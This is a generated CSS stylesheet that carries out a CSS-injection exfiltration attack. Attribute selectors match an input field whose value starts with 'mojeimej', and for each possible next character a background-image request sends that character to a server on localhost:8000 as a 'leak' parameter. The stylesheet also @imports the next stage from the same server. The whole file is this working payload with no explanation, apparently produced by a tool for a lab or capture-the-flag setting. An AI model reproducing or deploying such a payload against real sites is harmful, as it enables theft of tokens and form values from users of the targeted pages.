@import url("http://localhost:8000/?l=10");
input[value="mojeimej!"] {background: url("http://localhost:8000/?leak=!&q=0.249788145334771");}
input[value="mojeimej\""] {background: url("http://localhost:8000/?leak=\"&q=0.6771084156064981");}
input[value="mojeimej#"] {background: url("http://localhost:8000/?leak=#&q=0.27456115558642025");}
input[value="mojeimej$"] {background: url("http://localhost:8000/?leak=$&q=0.9957171246287553");}
input[value="mojeimej%"] {background: url("http://localhost:8000/?leak=%&q=0.6098333700957563");}
input[value="mojeimej&"] {background: url("http://localhost:8000/?leak=&&q=0.5796504078077107");}
input[value="mojeimej'"] {background: url("http://localhost:8000/?leak='&q=0.7182320068066728");}
input[value="mojeimej("] {background: url("http://localhost:8000/?leak=(&q=0.5841925694846737");}
input[value="mojeimej)"] {background: url("http://localhost:8000/?leak=)&q=0.6698889665851393");}
input[value="mojeimej*"] {background: url("http://localhost:8000/?leak=*&q=0.6789517889363967");}
input[value="mojeimej+"] {background: url("http://localhost:8000/?leak=+&q=0.2947486752378903");}
input[value="mojeimej,"] {background: url("http://localhost:8000/?leak=,&q=0.6446245946783247");}
input[value="mojeimej-"] {background: url("http://localhost:8000/?leak=-&q=0.2915110647540782");}
input[value="mojeimej."] {background: url("http://localhost:8000/?leak=.&q=0.15934485042756075");}
input[value="mojeimej/"] {background: url("http://localhost:8000/?leak=/&q=0.15512815404472735");}
input[value="mojeimej0"] {background: url("http://localhost:8000/?leak=0&q=0.06954636256414148");}
input[value="mojeimej1"] {background: url("http://localhost:8000/?leak=1&q=0.6637863790507288");}
input[value="mojeimej2"] {background: url("http://localhost:8000/?leak=2&q=0.2582657212179238");}
input[value="mojeimej3"] {background: url("http://localhost:8000/?leak=3&q=0.6836909547052556");}
input[value="mojeimej4"] {background: url("http://localhost:8000/?leak=4&q=0.6702192136076492");}
input[value="mojeimej5"] {background: url("http://localhost:8000/?leak=5&q=0.5695903975703724");}
input[value="mojeimej6"] {background: url("http://localhost:8000/?leak=6&q=0.9698170311327383");}
input[value="mojeimej7"] {background: url("http://localhost:8000/?leak=7&q=0.5147898053690876");}
input[value="mojeimej8"] {background: url("http://localhost:8000/?leak=8&q=0.1849181233344801");}
input[value="mojeimej9"] {background: url("http://localhost:8000/?leak=9&q=0.6196734974132017");}
input[value="mojeimej:"] {background: url("http://localhost:8000/?leak=:&q=0.22801887285015332");}
input[value="mojeimej;"] {background: url("http://localhost:8000/?leak=;&q=0.6687704229989861");}
input[value="mojeimej<"] {background: url("http://localhost:8000/?leak=<&q=0.9368404729330384");}
input[value="mojeimej="] {background: url("http://localhost:8000/?leak==&q=0.5454498193794146");}
input[value="mojeimej>"] {background: url("http://localhost:8000/?leak=>&q=0.18352047882160516");}
input[value="mojeimej?"] {background: url("http://localhost:8000/?leak=?&q=0.5107288219112254");}
input[value="mojeimej@"] {background: url("http://localhost:8000/?leak=@&q=0.0304691139564639");}
input[value="mojeimejA"] {background: url("http://localhost:8000/?leak=A&q=0.3854124695420411");}
input[value="mojeimejB"] {background: url("http://localhost:8000/?leak=B&q=0.6322973018474762");}
input[value="mojeimejC"] {background: url("http://localhost:8000/?leak=C&q=0.9291035613375447");}
input[value="mojeimejD"] {background: url("http://localhost:8000/?leak=D&q=0.12214563070399231");}
input[value="mojeimejE"] {background: url("http://localhost:8000/?leak=E&q=0.09930090279930104");}
input[value="mojeimejF"] {background: url("http://localhost:8000/?leak=F&q=0.6392460555619384");}
input[value="mojeimejG"] {background: url("http://localhost:8000/?leak=G&q=0.5543900747050909");}
input[value="mojeimejH"] {background: url("http://localhost:8000/?leak=H&q=0.7700591276173714");}
input[value="mojeimejI"] {background: url("http://localhost:8000/?leak=I&q=0.13088530999423154");}
input[value="mojeimejJ"] {background: url("http://localhost:8000/?leak=J&q=0.7564559423863719");}
input[value="mojeimejK"] {background: url("http://localhost:8000/?leak=K&q=0.42360707532271413");}
input[value="mojeimejL"] {background: url("http://localhost:8000/?leak=L&q=0.9532707663343727");}
input[value="mojeimejM"] {background: url("http://localhost:8000/?leak=M&q=0.7048015281050701");}
input[value="mojeimejN"] {background: url("http://localhost:8000/?leak=N&q=0.7468988903519105");}
input[value="mojeimejO"] {background: url("http://localhost:8000/?leak=O&q=0.49455327446169317");}
input[value="mojeimejP"] {background: url("http://localhost:8000/?leak=P&q=0.5528475280424936");}
input[value="mojeimejQ"] {background: url("http://localhost:8000/?leak=Q&q=0.793682129413839");}
input[value="mojeimejR"] {background: url("http://localhost:8000/?leak=R&q=0.44698323939485785");}
input[value="mojeimejS"] {background: url("http://localhost:8000/?leak=S&q=0.5754978579287631");}
input[value="mojeimejT"] {background: url("http://localhost:8000/?leak=T&q=0.1332566918074123");}
input[value="mojeimejU"] {background: url("http://localhost:8000/?leak=U&q=0.3107222762753674");}
input[value="mojeimejV"] {background: url("http://localhost:8000/?leak=V&q=0.3614700677776994");}
input[value="mojeimejW"] {background: url("http://localhost:8000/?leak=W&q=0.4145302022959785");}
input[value="mojeimejX"] {background: url("http://localhost:8000/?leak=X&q=0.9233481710073728");}
input[value="mojeimejY"] {background: url("http://localhost:8000/?leak=Y&q=0.30448726305179763");}
input[value="mojeimejZ"] {background: url("http://localhost:8000/?leak=Z&q=0.5579935853334024");}
input[value="mojeimej["] {background: url("http://localhost:8000/?leak=[&q=0.3329271145154433");}
input[value="mojeimej\\"] {background: url("http://localhost:8000/?leak=\\&q=0.7216491321857914");}
input[value="mojeimej]"] {background: url("http://localhost:8000/?leak=]&q=0.051392577768180736");}
input[value="mojeimej^"] {background: url("http://localhost:8000/?leak=^&q=0.8461895571815812");}
input[value="mojeimej_"] {background: url("http://localhost:8000/?leak=_&q=0.4128670225522981");}
input[value="mojeimej`"] {background: url("http://localhost:8000/?leak=`&q=0.26580991929683595");}
input[value="mojeimeja"] {background: url("http://localhost:8000/?leak=a&q=0.026383656035304126");}
input[value="mojeimejb"] {background: url("http://localhost:8000/?leak=b&q=0.34775335692978526");}
input[value="mojeimejc"] {background: url("http://localhost:8000/?leak=c&q=0.46956757173438013");}
input[value="mojeimejd"] {background: url("http://localhost:8000/?leak=d&q=0.9742146824835223");}
input[value="mojeimeje"] {background: url("http://localhost:8000/?leak=e&q=0.27499153066709203");}
input[value="mojeimejf"] {background: url("http://localhost:8000/?leak=f&q=0.653210590706258");}
input[value="mojeimejg"] {background: url("http://localhost:8000/?leak=g&q=0.6832111239556531");}
input[value="mojeimejh"] {background: url("http://localhost:8000/?leak=h&q=0.3737676622268675");}
input[value="mojeimeji"] {background: url("http://localhost:8000/?leak=i&q=0.9679857151511464");}
input[value="mojeimejj"] {background: url("http://localhost:8000/?leak=j&q=0.9912057705738553");}
input[value="mojeimejk"] {background: url("http://localhost:8000/?leak=k&q=0.13322638432510847");}
input[value="mojeimejl"] {background: url("http://localhost:8000/?leak=l&q=0.4288671250840521");}
input[value="mojeimejm"] {background: url("http://localhost:8000/?leak=m&q=0.007498639599440748");}
input[value="mojeimejn"] {background: url("http://localhost:8000/?leak=n&q=0.8606425111866505");}
input[value="mojeimejo"] {background: url("http://localhost:8000/?leak=o&q=0.28220371308485115");}
input[value="mojeimejp"] {background: url("http://localhost:8000/?leak=p&q=0.13036307383210177");}
input[value="mojeimejq"] {background: url("http://localhost:8000/?leak=q&q=0.10782435598550322");}
input[value="mojeimejr"] {background: url("http://localhost:8000/?leak=r&q=0.015725019250954375");}
input[value="mojeimejs"] {background: url("http://localhost:8000/?leak=s&q=0.5802206166836112");}
input[value="mojeimejt"] {background: url("http://localhost:8000/?leak=t&q=0.6497814305111815");}
input[value="mojeimeju"] {background: url("http://localhost:8000/?leak=u&q=0.1916878095996546");}
input[value="mojeimejv"] {background: url("http://localhost:8000/?leak=v&q=0.36547501827530815");}
input[value="mojeimejw"] {background: url("http://localhost:8000/?leak=w&q=0.9945846714072737");}
input[value="mojeimejx"] {background: url("http://localhost:8000/?leak=x&q=0.03263289884688558");}
input[value="mojeimejy"] {background: url("http://localhost:8000/?leak=y&q=0.4149784586317695");}
input[value="mojeimejz"] {background: url("http://localhost:8000/?leak=z&q=0.5112335804376487");}
input[value="mojeimej{"] {background: url("http://localhost:8000/?leak={&q=0.9767028220196639");}
input[value="mojeimej|"] {background: url("http://localhost:8000/?leak=|&q=0.42112613318233594");}
input[value="mojeimej}"] {background: url("http://localhost:8000/?leak=}&q=0.541493756105641");}
input[value="mojeimej~"] {background: url("http://localhost:8000/?leak=~&q=0.511419224649641");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.9368708179058804");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.31340263850259675");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.5380402639430142");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.8534672612855672");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.15781958920522499");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.11689964733291891");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.09502829238253319");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.9850473443199117");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.8559769440199576");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.04636062093035931");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.014886861701040033");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.23540302039665884");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.8007550705999942");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.9627971141016116");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.24313760682774022");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.6981317470287567");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.32073344423617467");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.32235338837356164");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.32188312232477023");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.9132432021380621");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.7754480591003252");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.6372555774695141");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.633557911073447");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.5481129506172815");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.8432397658803343");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.3791665568708422");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.8894361712977037");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.9123208987901374");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.022392034254284265");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.23552404114950387");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.9757786702040758");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.6780072395017691");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=&q=0.4775091084123819");}
input[value="mojeimej "] {background: url("http://localhost:8000/?leak= &q=0.9355565182712604");}
input[value="mojeimej¡"] {background: url("http://localhost:8000/?leak=¡&q=0.052779991007729565");}
input[value="mojeimej¢"] {background: url("http://localhost:8000/?leak=¢&q=0.44437549499029494");}
input[value="mojeimej£"] {background: url("http://localhost:8000/?leak=£&q=0.3964197645830314");}
input[value="mojeimej¤"] {background: url("http://localhost:8000/?leak=¤&q=0.8586667524210305");}
input[value="mojeimej¥"] {background: url("http://localhost:8000/?leak=¥&q=0.7120408703054386");}
input[value="mojeimej¦"] {background: url("http://localhost:8000/?leak=¦&q=0.7015187977234567");}
input[value="mojeimej§"] {background: url("http://localhost:8000/?leak=§&q=0.9288906085259567");}
input[value="mojeimej¨"] {background: url("http://localhost:8000/?leak=¨&q=0.564820629418701");}
input[value="mojeimej©"] {background: url("http://localhost:8000/?leak=©&q=0.9795189549497414");}
input[value="mojeimejª"] {background: url("http://localhost:8000/?leak=ª&q=0.25475134585660353");}
input[value="mojeimej«"] {background: url("http://localhost:8000/?leak=«&q=0.2327209677099078");}
input[value="mojeimej¬"] {background: url("http://localhost:8000/?leak=¬&q=0.9607844333705886");}
input[value="mojeimej­"] {background: url("http://localhost:8000/?leak=­&q=0.9191080131566784");}
input[value="mojeimej®"] {background: url("http://localhost:8000/?leak=®&q=0.512083597864188");}
input[value="mojeimej¯"] {background: url("http://localhost:8000/?leak=¯&q=0.6721011236142875");}
input[value="mojeimej°"] {background: url("http://localhost:8000/?leak=°&q=0.12586840169122815");}
input[value="mojeimej±"] {background: url("http://localhost:8000/?leak=±&q=0.43242514790181796");}
input[value="mojeimej²"] {background: url("http://localhost:8000/?leak=²&q=0.8520290502118422");}
input[value="mojeimej³"] {background: url("http://localhost:8000/?leak=³&q=0.8813415116860919");}
input[value="mojeimej´"] {background: url("http://localhost:8000/?leak=´&q=0.5759200420104393");}
input[value="mojeimejµ"] {background: url("http://localhost:8000/?leak=µ&q=0.0856288190662271");}
input[value="mojeimej¶"] {background: url("http://localhost:8000/?leak=¶&q=0.8585783979311146");}
input[value="mojeimej·"] {background: url("http://localhost:8000/?leak=·&q=0.8490855615740998");}
input[value="mojeimej¸"] {background: url("http://localhost:8000/?leak=¸&q=0.7023534275554804");}
input[value="mojeimej¹"] {background: url("http://localhost:8000/?leak=¹&q=0.6671833175411892");}
input[value="mojeimejº"] {background: url("http://localhost:8000/?leak=º&q=0.8728325711720069");}
input[value="mojeimej»"] {background: url("http://localhost:8000/?leak=»&q=0.03748686988972616");}
input[value="mojeimej¼"] {background: url("http://localhost:8000/?leak=¼&q=0.4222937507018736");}
input[value="mojeimej½"] {background: url("http://localhost:8000/?leak=½&q=0.4101489870670163");}
input[value="mojeimej¾"] {background: url("http://localhost:8000/?leak=¾&q=0.7709546414034416");}
input[value="mojeimej¿"] {background: url("http://localhost:8000/?leak=¿&q=0.5693523019957178");}
input[value="mojeimejÀ"] {background: url("http://localhost:8000/?leak=À&q=0.8621906109203077");}
input[value="mojeimejÁ"] {background: url("http://localhost:8000/?leak=Á&q=0.9802312634498023");}
input[value="mojeimejÂ"] {background: url("http://localhost:8000/?leak=Â&q=0.19966267480416433");}
input[value="mojeimejÃ"] {background: url("http://localhost:8000/?leak=Ã&q=0.7283118351990554");}
input[value="mojeimejÄ"] {background: url("http://localhost:8000/?leak=Ä&q=0.05463837397982374");}
input[value="mojeimejÅ"] {background: url("http://localhost:8000/?leak=Å&q=0.8160963672283779");}
input[value="mojeimejÆ"] {background: url("http://localhost:8000/?leak=Æ&q=0.7751650804647281");}
input[value="mojeimejÇ"] {background: url("http://localhost:8000/?leak=Ç&q=0.1634528979903087");}
input[value="mojeimejÈ"] {background: url("http://localhost:8000/?leak=È&q=0.8316660569381833");}
input[value="mojeimejÉ"] {background: url("http://localhost:8000/?leak=É&q=0.6622349021407072");}
input[value="mojeimejÊ"] {background: url("http://localhost:8000/?leak=Ê&q=0.221901788715003");}
input[value="mojeimejË"] {background: url("http://localhost:8000/?leak=Ë&q=0.5674447980277866");}
input[value="mojeimejÌ"] {background: url("http://localhost:8000/?leak=Ì&q=0.9491500107424533");}
input[value="mojeimejÍ"] {background: url("http://localhost:8000/?leak=Í&q=0.7255427680541182");}
input[value="mojeimejÎ"] {background: url("http://localhost:8000/?leak=Î&q=0.25361901882549653");}
input[value="mojeimejÏ"] {background: url("http://localhost:8000/?leak=Ï&q=0.22408613757561113");}
input[value="mojeimejÐ"] {background: url("http://localhost:8000/?leak=Ð&q=0.8027326507617871");}
input[value="mojeimejÑ"] {background: url("http://localhost:8000/?leak=Ñ&q=0.7533450170877183");}
input[value="mojeimejÒ"] {background: url("http://localhost:8000/?leak=Ò&q=0.7098323942975684");}
input[value="mojeimejÓ"] {background: url("http://localhost:8000/?leak=Ó&q=0.980794550464178");}
input[value="mojeimejÔ"] {background: url("http://localhost:8000/?leak=Ô&q=0.2996302788517726");}
input[value="mojeimejÕ"] {background: url("http://localhost:8000/?leak=Õ&q=0.8797264457209706");}
input[value="mojeimejÖ"] {background: url("http://localhost:8000/?leak=Ö&q=0.2591477089177203");}
input[value="mojeimej×"] {background: url("http://localhost:8000/?leak=×&q=0.5978067859225293");}
input[value="mojeimejØ"] {background: url("http://localhost:8000/?leak=Ø&q=0.6668067674960567");}
input[value="mojeimejÙ"] {background: url("http://localhost:8000/?leak=Ù&q=0.3427803252708874");}
input[value="mojeimejÚ"] {background: url("http://localhost:8000/?leak=Ú&q=0.46870109662826587");}
input[value="mojeimejÛ"] {background: url("http://localhost:8000/?leak=Û&q=0.9066112380852134");}
input[value="mojeimejÜ"] {background: url("http://localhost:8000/?leak=Ü&q=0.8497726404914117");}
input[value="mojeimejÝ"] {background: url("http://localhost:8000/?leak=Ý&q=0.254994087024939");}
input[value="mojeimejÞ"] {background: url("http://localhost:8000/?leak=Þ&q=0.38821649692745797");}
input[value="mojeimejß"] {background: url("http://localhost:8000/?leak=ß&q=0.9328334438800108");}
input[value="mojeimejà"] {background: url("http://localhost:8000/?leak=à&q=0.6451098772292212");}
input[value="mojeimejá"] {background: url("http://localhost:8000/?leak=á&q=0.2838468150408242");}
input[value="mojeimejâ"] {background: url("http://localhost:8000/?leak=â&q=0.3989395768711055");}
input[value="mojeimejã"] {background: url("http://localhost:8000/?leak=ã&q=0.9397371604065929");}
input[value="mojeimejä"] {background: url("http://localhost:8000/?leak=ä&q=0.23751124049493955");}
input[value="mojeimejå"] {background: url("http://localhost:8000/?leak=å&q=0.9884540208462582");}
input[value="mojeimejæ"] {background: url("http://localhost:8000/?leak=æ&q=0.741436245073642");}
input[value="mojeimejç"] {background: url("http://localhost:8000/?leak=ç&q=0.15484590682709132");}
input[value="mojeimejè"] {background: url("http://localhost:8000/?leak=è&q=0.8659981750758183");}
input[value="mojeimejé"] {background: url("http://localhost:8000/?leak=é&q=0.2210972903349715");}
input[value="mojeimejê"] {background: url("http://localhost:8000/?leak=ê&q=0.8524518627155724");}
input[value="mojeimejë"] {background: url("http://localhost:8000/?leak=ë&q=0.09695067761843856");}
input[value="mojeimejì"] {background: url("http://localhost:8000/?leak=ì&q=0.5583791510297595");}
input[value="mojeimejí"] {background: url("http://localhost:8000/?leak=í&q=0.6937238881643311");}
input[value="mojeimejî"] {background: url("http://localhost:8000/?leak=î&q=0.1071669594472362");}
input[value="mojeimejï"] {background: url("http://localhost:8000/?leak=ï&q=0.23662125086455");}
input[value="mojeimejð"] {background: url("http://localhost:8000/?leak=ð&q=0.18277894856589483");}
input[value="mojeimejñ"] {background: url("http://localhost:8000/?leak=ñ&q=0.43972391047794934");}
input[value="mojeimejò"] {background: url("http://localhost:8000/?leak=ò&q=0.6301651739426068");}
input[value="mojeimejó"] {background: url("http://localhost:8000/?leak=ó&q=0.945342867677128");}
input[value="mojeimejô"] {background: url("http://localhost:8000/?leak=ô&q=0.8854425012014613");}
input[value="mojeimejõ"] {background: url("http://localhost:8000/?leak=õ&q=0.3746643441465445");}
input[value="mojeimejö"] {background: url("http://localhost:8000/?leak=ö&q=0.6996971143705912");}
input[value="mojeimej÷"] {background: url("http://localhost:8000/?leak=÷&q=0.7716803033804569");}
input[value="mojeimejø"] {background: url("http://localhost:8000/?leak=ø&q=0.3266470710399749");}
input[value="mojeimejù"] {background: url("http://localhost:8000/?leak=ù&q=0.8600399852648204");}
input[value="mojeimejú"] {background: url("http://localhost:8000/?leak=ú&q=0.7202456196503562");}
input[value="mojeimejû"] {background: url("http://localhost:8000/?leak=û&q=0.3649263960104083");}
input[value="mojeimejü"] {background: url("http://localhost:8000/?leak=ü&q=0.5351896743374829");}
input[value="mojeimejý"] {background: url("http://localhost:8000/?leak=ý&q=0.6658763309045177");}
input[value="mojeimejþ"] {background: url("http://localhost:8000/?leak=þ&q=0.32214268492318787");}
input[value="mojeimejÿ"] {background: url("http://localhost:8000/?leak=ÿ&q=0.4718851814344256");}
